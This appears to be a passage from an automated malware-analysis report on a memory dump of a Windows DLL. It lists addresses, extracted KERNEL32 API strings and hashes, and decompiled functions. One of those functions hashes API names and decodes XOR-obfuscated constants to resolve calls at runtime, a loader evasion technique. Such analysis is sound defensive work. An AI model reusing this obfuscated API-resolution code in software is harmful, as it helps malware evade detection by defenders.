0x6eda190c
0x6eda1910
0x6eda191c
0x6eda1923
0x6eda1924
0x6eda1910
0x6eda1929
0x6eda192e
0x6eda1936
0x6eda193e
0x6eda194f
0x6eda1951
0x6eda1953
0x6eda195c
0x6eda1960
0x6eda1961
0x6eda1953
0x6eda1972
0x6eda1977
0x6eda1979
0x6eda1983
0x6eda1986
0x6eda198e
0x6eda1990
0x6eda1990
0x6eda1993
0x6eda1994
0x6eda1990
0x6eda1999
0x6eda199c
0x6eda19a9
0x6eda19ae
0x6eda19ae
0x6eda19b1
0x6eda19b3
0x6eda19c1
0x6eda19c3
0x6eda19c3
0x6eda19c6
0x6eda19c7
0x6eda19c3
0x6eda19cc
0x6eda19cf
0x6eda19df
0x6eda19e4
0x6eda19e4
0x6eda19e7
0x6eda19ef
0x6eda19fa
0x6eda1a05
0x6eda1a10
0x6eda1a2a
0x6eda1a2c
0x6eda1a30
0x6eda1a3c
0x6eda1a43
0x6eda1a44
0x6eda1a30
0x6eda1a49
0x6eda1a4e
0x6eda1a56
0x6eda1a5e
0x6eda1a6f
0x6eda1a71
0x6eda1a73
0x6eda1a7c
0x6eda1a80
0x6eda1a81
0x6eda1a73
0x6eda1a92
0x6eda1a97
0x6eda1a99
0x6eda1aa3
0x6eda1aa6
0x6eda1aae
0x6eda1ab0
0x6eda1ab0
0x6eda1ab3
0x6eda1ab4
0x6eda1ab0
0x6eda1ab9
0x6eda1abc
0x6eda1ac9
0x6eda1ace
0x6eda1ace
0x6eda1ad1
0x6eda1ad3
0x6eda1ae1
0x6eda1ae3
0x6eda1ae3
0x6eda1ae6
0x6eda1ae7
0x6eda1ae3
0x6eda1aec
0x6eda1aef
0x6eda1aff
0x6eda1b04
0x6eda1b04
0x6eda1b07
0x6eda1b0f
0x6eda1b1a
0x6eda1b25
0x6eda1b30
0x6eda1b4a
0x6eda1b4c
0x6eda1b50
0x6eda1b5c
0x6eda1b63
0x6eda1b64
0x6eda1b50
0x6eda1b69
0x6eda1b71
0x6eda1b7c
0x6eda1b87
0x6eda1b92
0x6eda1bac
0x6eda1bae
0x6eda1bb0
0x6eda1bbc
0x6eda1bc3
0x6eda1bc4
0x6eda1bb0
0x6eda1bd5
0x6eda1bda
0x6eda1bdc
0x6eda1be6
0x6eda1be9
0x6eda1bf7
0x6eda1c00
0x6eda1c00
0x6eda1c03
0x6eda1c04
0x6eda1c00
0x6eda1c09
0x6eda1c0c
0x6eda1c1c
0x6eda1c21
0x6eda1c21
0x6eda1c24
0x6eda1c26
0x6eda1c34
0x6eda1c36
0x6eda1c36
0x6eda1c39
0x6eda1c3a
0x6eda1c36
0x6eda1c3f
0x6eda1c42
0x6eda1c52
0x6eda1c57
0x6eda1c57
0x6eda1c5a
0x6eda1c62
0x6eda1c6d
0x6eda1c78
0x6eda1c83
0x6eda1c9d
0x6eda1c9f
0x6eda1ca1
0x6eda1cad
0x6eda1cb4
0x6eda1cb5
0x6eda1ca1
0x6eda1cba
0x6eda1cc2
0x6eda1ccd
0x6eda1cd8
0x6eda1ce3
0x6eda1cfd
0x6eda1cff
0x6eda1d01
0x6eda1d0d
0x6eda1d14
0x6eda1d15
0x6eda1d01
0x6eda1d26
0x6eda1d2b
0x6eda1d2d
0x6eda1d37
0x6eda1d3a
0x6eda1d48
0x6eda1d4a
0x6eda1d50
0x6eda1d50
0x6eda1d53
0x6eda1d54
0x6eda1d50
0x6eda1d59
0x6eda1d5c
0x6eda1d6c
0x6eda1d71
0x6eda1d71
0x6eda1d74
0x6eda1d76
0x6eda1d84
0x6eda1d86
0x6eda1d86
0x6eda1d89
0x6eda1d8a
0x6eda1d86
0x6eda1d8f
0x6eda1d92
0x6eda1da2
0x6eda1da7
0x6eda1da7
0x6eda1daa
0x6eda1db2
0x6eda1dbd
0x6eda1dc8
0x6eda1dd3
0x6eda1ded
0x6eda1def
0x6eda1df1
0x6eda1dfd
0x6eda1e04
0x6eda1e05
0x6eda1df1
0x6eda1e0a
0x6eda1e0f
0x6eda1e17
0x6eda1e1f
0x6eda1e30
0x6eda1e32
0x6eda1e40
0x6eda1e49
0x6eda1e4d
0x6eda1e4e
0x6eda1e40
0x6eda1e5f
0x6eda1e64
0x6eda1e66
0x6eda1e70
0x6eda1e73
0x6eda1e7b
0x6eda1e80
0x6eda1e80
0x6eda1e83
0x6eda1e84
0x6eda1e80
0x6eda1e89
0x6eda1e8c
0x6eda1e99
0x6eda1e9e
0x6eda1e9e
0x6eda1ea1
0x6eda1ea3
0x6eda1eb1
0x6eda1eb3
0x6eda1eb3
0x6eda1eb6
0x6eda1eb7
0x6eda1eb3
0x6eda1ebc
0x6eda1ebf
0x6eda1ecf
0x6eda1ed4
0x6eda1ed4
0x6eda1ed7
0x6eda1edf
0x6eda1eea
0x6eda1ef5
0x6eda1f00
0x6eda1f1a
0x6eda1f1c
0x6eda1f20
0x6eda1f2c
0x6eda1f33
0x6eda1f34
0x6eda1f20
0x6eda1f39
0x6eda1f3e
0x6eda1f46
0x6eda1f4e
0x6eda1f5f
0x6eda1f61
0x6eda1f63
0x6eda1f6c
0x6eda1f70
0x6eda1f71
0x6eda1f63
0x6eda1f82
0x6eda1f87
0x6eda1f89
0x6eda1f93
0x6eda1f96
0x6eda1f9e
0x6eda1fa0
0x6eda1fa0
0x6eda1fa3
0x6eda1fa4
0x6eda1fa0
0x6eda1fa9
0x6eda1fac
0x6eda1fb9
0x6eda1fbe
0x6eda1fbe
0x6eda1fc1
0x6eda1fc3
0x6eda1fd1
0x6eda1fd3
0x6eda1fd3
0x6eda1fd6
0x6eda1fd7
0x6eda1fd3
0x6eda1fdc
0x6eda1fdf
0x6eda1fef
0x6eda1ff4
0x6eda1ff4
0x6eda1ff7
0x6eda1fff
0x6eda200a
0x6eda2015
0x6eda2020
0x6eda203a
0x6eda203c
0x6eda2040
0x6eda204c
0x6eda2053
0x6eda2054
0x6eda2040
0x6eda2059
0x6eda2061
0x6eda206c
0x6eda2077
0x6eda2082
0x6eda209c
0x6eda209e
0x6eda20a0
0x6eda20ac
0x6eda20b3
0x6eda20b4
0x6eda20a0
0x6eda20c5
0x6eda20ca
0x6eda20cc
0x6eda20d6
0x6eda20d9
0x6eda20e7
0x6eda20f0
0x6eda20f0
0x6eda20f3
0x6eda20f4
0x6eda20f0
0x6eda20f9
0x6eda20fc
0x6eda210c
0x6eda2111
0x6eda2111
0x6eda2114
0x6eda2116
0x6eda2124
0x6eda2126
0x6eda2126
0x6eda2129
0x6eda212a
0x6eda2126
0x6eda212f
0x6eda2132
0x6eda2142
0x6eda2147
0x6eda2147
0x6eda214a
0x6eda2152
0x6eda215d
0x6eda2168
0x6eda2173
0x6eda218d
0x6eda218f
0x6eda2191
0x6eda219d
0x6eda21a4
0x6eda21a5
0x6eda2191
0x6eda21aa
0x6eda21af
0x6eda21b7
0x6eda21bf
0x6eda21d3
0x6eda21d5
0x6eda21d7
0x6eda21e0
0x6eda21e9
0x6eda21ed
0x6eda21ee
0x6eda21e0
0x6eda21ff
0x6eda2204
0x6eda2206
0x6eda2210
0x6eda2213
0x6eda221b
0x6eda2220
0x6eda2220
0x6eda2223
0x6eda2224
0x6eda2220
0x6eda2229
0x6eda222c
0x6eda2239
0x6eda223e
0x6eda223e
0x6eda2241
0x6eda2243
0x6eda2251
0x6eda2253
0x6eda2253
0x6eda2256
0x6eda2257
0x6eda2253
0x6eda225c
0x6eda225f
0x6eda226f
0x6eda2274
0x6eda2274
0x6eda2277
0x6eda227f
0x6eda228a
0x6eda2295
0x6eda22a0
0x6eda22ba
0x6eda22bc
0x6eda22c0
0x6eda22cc
0x6eda22d3
0x6eda22d4
0x6eda22c0
0x6eda22d9
0x6eda22e1
0x6eda22ec
0x6eda22f7
0x6eda2311
0x6eda2313
0x6eda2315
0x6eda2320
0x6eda232c
0x6eda2333
0x6eda2334
0x6eda2320
0x6eda2345
0x6eda234a
0x6eda234c
0x6eda2356
0x6eda2359
0x6eda2367
0x6eda2370
0x6eda2370
0x6eda2373
0x6eda2374
0x6eda2370
0x6eda2379
0x6eda237c
0x6eda238c
0x6eda2391
0x6eda2391
0x6eda2394
0x6eda2396
0x6eda23a4
0x6eda23a6
0x6eda23a6
0x6eda23a9
0x6eda23aa
0x6eda23a6
0x6eda23af
0x6eda23b2
0x00000000
0x6eda23c7
0x6eda23cd

Strings

FindNextFileA, xrefs: 6EDA1BD0, 6EDA1C17
KERNEL32.dll, xrefs: 6EDA151A
KERNEL32.dll, xrefs: 6EDA1AFA
VirtualProtect, xrefs: 6EDA1221, 6EDA1267
es0V, xrefs: 6EDA21B7
GetProcessHeap, xrefs: 6EDA15F0, 6EDA1637
KERNEL32.DLL, xrefs: 6EDA213D
KERNEL32.dll, xrefs: 6EDA114D
KERNEL32.dll, xrefs: 6EDA13ED
VirtualFree, xrefs: 6EDA14AA, 6EDA14E4
HeapAlloc, xrefs: 6EDA172A, 6EDA1764
HeapSize, xrefs: 6EDA184D, 6EDA1884
y<(, xrefs: 6EDA1545
SetFilePointer, xrefs: 6EDA20C0, 6EDA2107
KERNEL32.DLL, xrefs: 6EDA1ECA
KERNEL32.DLL, xrefs: 6EDA1FEA
ReadFile, xrefs: 6EDA21FA, 6EDA2234
KERNEL32.DLL, xrefs: 6EDA23BD
KERNEL32.dll, xrefs: 6EDA18BA
HeapReAlloc, xrefs: 6EDA1A8D, 6EDA1AC4
<t;, xrefs: 6EDA133E
CloseHandle, xrefs: 6EDA2340, 6EDA2387
KERNEL32.DLL, xrefs: 6EDA1D9D
CreateFileA, xrefs: 6EDA1F7D, 6EDA1FB4
KERNEL32.dll, xrefs: 6EDA19DA
KERNEL32.DLL, xrefs: 6EDA226A
VirtualAlloc, xrefs: 6EDA10D3, 6EDA1117
KERNEL32.dll, xrefs: 6EDA129D
FindFirstFileA, xrefs: 6EDA1D21, 6EDA1D67
FindClose, xrefs: 6EDA1E5A, 6EDA1E94
VirtualQuery, xrefs: 6EDA1371, 6EDA13B7
KERNEL32.DLL, xrefs: 6EDA1C4D
HeapFree, xrefs: 6EDA196D, 6EDA19A4
KERNEL32.dll, xrefs: 6EDA166D
KERNEL32.dll, xrefs: 6EDA179A

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: <t;$CloseHandle$CreateFileA$FindClose$FindFirstFileA$FindNextFileA$GetProcessHeap$HeapAlloc$HeapFree$HeapReAlloc$HeapSize$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.DLL$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$ReadFile$SetFilePointer$VirtualAlloc$VirtualFree$VirtualProtect$VirtualQuery$es0V$y<(
API String ID: 0-3693769323
Opcode ID: c1f645e4a4498f7083d305078ec6c5d322ca45667b6ca6a9bf504de3e1f5e146
Instruction ID: 62778c08868cc9652147f441ae4c1d3e2c5a3357cb8955238eac34a06a9863fc
Opcode Fuzzy Hash: c1f645e4a4498f7083d305078ec6c5d322ca45667b6ca6a9bf504de3e1f5e146
Instruction Fuzzy Hash: 82B293B081D3C19EE365DF98E454BEFBBE4AB82308F54486DD2C98B241E771D2498B53

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA3F9D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA3F9D(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6EDA40B8(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6EDA4690(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6EDA4690(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6EDA40B8(_t49);
				}
				return _t49;
			}

0x6eda3f9d
0x6eda3f9d
0x6eda3f9d
0x6eda3fb1
0x6eda3fb3
0x6eda3fb6
0x6eda3fb6
0x6eda3fba
0x6eda3fbf
0x6eda3fd7
0x6eda3fdd
0x6eda3fe3
0x6eda3fe9
0x6eda3fef
0x6eda3ff5
0x6eda3ffb
0x6eda4002
0x6eda4009
0x6eda4010
0x6eda4017
0x6eda401e
0x6eda4025
0x6eda4026
0x6eda402f
0x6eda4035
0x6eda4038
0x6eda403e
0x6eda404d
0x6eda4059
0x6eda4064
0x6eda406b
0x6eda4072
0x6eda407d
0x6eda4085
0x6eda408e
0x6eda4090
0x6eda4093
0x6eda4095
0x6eda409f
0x6eda40a7
0x6eda40ad
0x00000000
0x6eda40b4
0x6eda40b7

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EDA3FA9
IsDebuggerPresent.KERNEL32 ref: 6EDA4075
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EDA4095
UnhandledExceptionFilter.KERNEL32(?), ref: 6EDA409F

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: fbd2c4b455aa0dc532f671b597d0d6d96551d7df6cfac7fef1b617851bf98534
Instruction ID: 0002daaae3943d165f8c48d6965b842aa8e6e0c44be6a155eead4d0d29a8ccb8
Opcode Fuzzy Hash: fbd2c4b455aa0dc532f671b597d0d6d96551d7df6cfac7fef1b617851bf98534
Instruction Fuzzy Hash: F8311A75D45218DBDF10DFA8D9897CDBBF8AF04304F10409AE508AB250EB719B86DF59

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6868, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EDA6868(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6edc3004; // 0x8da52076
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6EDA40B8(_t41);
					_pop(_t61);
				}
				E6EDA4690(_t66,  &_v804, 0, 0x50);
				E6EDA4690(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E6EDA40B8(_t57);
				}
				return E6EDA3753(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x6eda6868
0x6eda6868
0x6eda6868
0x6eda6873
0x6eda6878
0x6eda687a
0x6eda6882
0x6eda6884
0x6eda6887
0x6eda688c
0x6eda688c
0x6eda6898
0x6eda68ab
0x6eda68b9
0x6eda68bf
0x6eda68c5
0x6eda68cb
0x6eda68d1
0x6eda68d7
0x6eda68dd
0x6eda68e3
0x6eda68e9
0x6eda68ef
0x6eda68f6
0x6eda68fd
0x6eda6904
0x6eda690b
0x6eda6912
0x6eda6919
0x6eda691a
0x6eda6923
0x6eda6929
0x6eda692c
0x6eda6932
0x6eda693f
0x6eda6948
0x6eda6951
0x6eda695a
0x6eda6968
0x6eda696a
0x6eda697f
0x6eda698b
0x6eda698e
0x6eda6993
0x6eda69a2

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EDA6960
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EDA696A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EDA6977

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 69bdf3c8c8c2e73385789d6f9e0a400d60b432c4a916c038248201c22234b0bc
Instruction ID: a5200293d0ce1c0958e00c7c01b1b22c2ef8c87e4a63aae34cdbee0624922513
Opcode Fuzzy Hash: 69bdf3c8c8c2e73385789d6f9e0a400d60b432c4a916c038248201c22234b0bc
Instruction Fuzzy Hash: 3531057591121CDBCB21DF68D8887CCBBB8BF08310F5045EAE91CA7290EB709B818F55

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA567B, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA567B(int _a4) {
				void* _t14;

				if(E6EDA6835(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6EDA5700(_t14, _a4);
				ExitProcess(_a4);
			}

0x6eda5688
0x6eda56a4
0x6eda56a4
0x6eda56ad
0x6eda56b6

APIs

GetCurrentProcess.KERNEL32(?,?,6EDA567A,?,00000001,?,?), ref: 6EDA569D
TerminateProcess.KERNEL32(00000000,?,6EDA567A,?,00000001,?,?), ref: 6EDA56A4
ExitProcess.KERNEL32 ref: 6EDA56B6

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7b61983f4b0cbc6d36c2cfe1f60b2733f4b318de136210aea9b09b8d0fa428b7
Instruction ID: ead60173d24a63158254f95e6cc61c8e8bc9ecadc96afb364a7dbd99e8bd90e4
Opcode Fuzzy Hash: 7b61983f4b0cbc6d36c2cfe1f60b2733f4b318de136210aea9b09b8d0fa428b7
Instruction Fuzzy Hash: 5FE04631010908EFDF112BACC858A8C3B78FB45241B004810FA15CA124CB36DB82DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA3010, Relevance: 4.0, Strings: 3, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E6EDA3010(intOrPtr* __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				intOrPtr* _t80;
				char _t81;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t87;
				signed int _t89;
				signed int _t95;
				signed int _t101;
				signed int _t107;
				signed int _t113;
				signed int _t117;
				signed char _t121;
				signed char _t122;
				signed char _t123;
				signed char _t124;
				signed char _t125;
				signed char _t126;
				signed int _t134;
				signed int _t137;
				signed int _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t159;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				signed int _t164;
				intOrPtr* _t165;
				signed int _t166;
				intOrPtr* _t167;
				signed int _t168;
				void* _t176;

				_t80 = __ecx;
				_v16 = __edx;
				_t163 = __edx;
				_t149 = 0;
				_v8 = __ecx;
				_t121 =  *__edx;
				if(_t121 != 0) {
					do {
						_t146 = _t121 + 0x00000020 & 0x000000ff;
						_t163 = _t163 + 1;
						_t117 = _t121 & 0x000000ff;
						_t121 =  *_t163;
						_t147 =  >=  ? _t117 : _t146;
						_t118 =  >=  ? _t117 : _t146;
						_t149 = _t149 * 0x00000101 + ( >=  ? _t117 : _t146) ^ ( >=  ? _t117 : _t146) << 0x00000010;
					} while (_t121 != 0);
					_t80 = _v8;
				}
				_t122 =  *_t80;
				_t164 = 0;
				_t159 = _t80;
				while(_t122 != 0) {
					_t144 = _t122 + 0x00000020 & 0x000000ff;
					_t159 = _t159 + 1;
					_t113 = _t122 & 0x000000ff;
					_t122 =  *_t159;
					_t145 =  >=  ? _t113 : _t144;
					_t114 =  >=  ? _t113 : _t144;
					_t164 = _t164 * 0x00000101 + ( >=  ? _t113 : _t144) ^ ( >=  ? _t113 : _t144) << 0x00000010;
				}
				_t81 = E6EDA2ED0(_t164, _t149);
				if(_t81 == 0) {
					_v36 = _t81;
					_v32 = 0x8fc6622;
					_v28 = 0x1eff6022;
					_v24 = 0x2de47b0f;
					_v20 = 0x6c9d096e;
					if(_v36 == 0) {
						_t143 = 0;
						asm("o16 nop [eax+eax]");
						do {
							 *(_t176 + _t143 * 4 - 0x1c) =  *(_t176 + _t143 * 4 - 0x1c) ^ 0x6c9d096e;
							_t143 = _t143 + 1;
						} while (_t143 < 4);
					}
					_t123 = _v32;
					_t165 =  &_v32;
					_t150 = 0;
					while(_t123 != 0) {
						_t23 = _t123 + 0x20; // 0x8fc6642
						_t165 = _t165 + 1;
						_t107 = _t123 & 0x000000ff;
						_t123 =  *_t165;
						_t142 =  >=  ? _t107 : _t23 & 0x000000ff;
						_t108 =  >=  ? _t107 : _t23 & 0x000000ff;
						_t150 = _t150 * 0x00000101 + ( >=  ? _t107 : _t23 & 0x000000ff) ^ ( >=  ? _t107 : _t23 & 0x000000ff) << 0x00000010;
					}
					_v56 = 0;
					_v52 = 0x5bcc89a9;
					_v48 = 0x27ad80a7;
					_v44 = 0x59d288cc;
					_v40 = 0x159ecce2;
					if(_v56 == 0) {
						_t140 = 0;
						do {
							 *(_t176 + _t140 * 4 - 0x30) =  *(_t176 + _t140 * 4 - 0x30) ^ 0x159ecce2;
							_t140 = _t140 + 1;
						} while (_t140 < 4);
					}
					_t124 = _v52;
					_t161 =  &_v52;
					_t166 = 0;
					while(_t124 != 0) {
						_t40 = _t124 + 0x20; // 0x5bcc89c9
						_t161 = _t161 + 1;
						_t101 = _t124 & 0x000000ff;
						_t124 =  *_t161;
						_t139 =  >=  ? _t101 : _t40 & 0x000000ff;
						_t102 =  >=  ? _t101 : _t40 & 0x000000ff;
						_t166 = _t166 * 0x00000101 + ( >=  ? _t101 : _t40 & 0x000000ff) ^ ( >=  ? _t101 : _t40 & 0x000000ff) << 0x00000010;
					}
					_t84 = E6EDA2ED0(_t166, _t150);
					_v76 = 0;
					_v72 = 0x45996b72;
					_v68 = 0x548e6147;
					_v64 = 0x709f6a51;
					_v60 = 0x15ed7d46;
					_v12 = _t84;
					if(_v76 == 0) {
						_t137 = 0;
						do {
							 *(_t176 + _t137 * 4 - 0x44) =  *(_t176 + _t137 * 4 - 0x44) ^ 0x15ed0e35;
							_t137 = _t137 + 1;
						} while (_t137 < 4);
					}
					_t125 = _v72;
					_t167 =  &_v72;
					_t151 = 0;
					while(_t125 != 0) {
						_t58 = _t125 + 0x20; // 0x45996b92
						_t167 = _t167 + 1;
						_t95 = _t125 & 0x000000ff;
						_t125 =  *_t167;
						_t136 =  >=  ? _t95 : _t58 & 0x000000ff;
						_t96 =  >=  ? _t95 : _t58 & 0x000000ff;
						_t151 = _t151 * 0x00000101 + ( >=  ? _t95 : _t58 & 0x000000ff) ^ ( >=  ? _t95 : _t58 & 0x000000ff) << 0x00000010;
					}
					_v96 = 0;
					_v92 = 0x77845188;
					_v88 = 0xbe55886;
					_v84 = 0x759a50ed;
					_v80 = 0x39d614c3;
					if(_v96 == 0) {
						_t134 = 0;
						do {
							 *(_t176 + _t134 * 4 - 0x58) =  *(_t176 + _t134 * 4 - 0x58) ^ 0x39d614c3;
							_t134 = _t134 + 1;
						} while (_t134 < 4);
					}
					_t126 = _v92;
					_t162 =  &_v92;
					_t168 = 0;
					while(_t126 != 0) {
						_t75 = _t126 + 0x20; // 0x778451a8
						_t162 = _t162 + 1;
						_t89 = _t126 & 0x000000ff;
						_t126 =  *_t162;
						_t133 =  >=  ? _t89 : _t75 & 0x000000ff;
						_t90 =  >=  ? _t89 : _t75 & 0x000000ff;
						_t168 = _t168 * 0x00000101 + ( >=  ? _t89 : _t75 & 0x000000ff) ^ ( >=  ? _t89 : _t75 & 0x000000ff) << 0x00000010;
					}
					_t86 = E6EDA2ED0(_t168, _t151);
					_t87 = _v12(_v8);
					_t81 =  *_t86(_t87, _v16);
				}
				return _t81;
			}

0x6eda3019
0x6eda301c
0x6eda301f
0x6eda3021
0x6eda3023
0x6eda3026
0x6eda302b
0x6eda3030
0x6eda3036
0x6eda3039
0x6eda303c
0x6eda303f
0x6eda3041
0x6eda304a
0x6eda3052
0x6eda3054
0x6eda3058
0x6eda3058
0x6eda305b
0x6eda305d
0x6eda305f
0x6eda3063
0x6eda306b
0x6eda306e
0x6eda3071
0x6eda3074
0x6eda3076
0x6eda307f
0x6eda3087
0x6eda3089
0x6eda308f
0x6eda3096
0x6eda309c
0x6eda309f
0x6eda30a6
0x6eda30ad
0x6eda30b4
0x6eda30c2
0x6eda30c4
0x6eda30c6
0x6eda30d0
0x6eda30d9
0x6eda30dd
0x6eda30de
0x6eda30d0
0x6eda30e3
0x6eda30e6
0x6eda30e9
0x6eda30ed
0x6eda30f0
0x6eda30f9
0x6eda30fc
0x6eda30ff
0x6eda3101
0x6eda310a
0x6eda3112
0x6eda3114
0x6eda3118
0x6eda311c
0x6eda3123
0x6eda312a
0x6eda3131
0x6eda313f
0x6eda3141
0x6eda3143
0x6eda314c
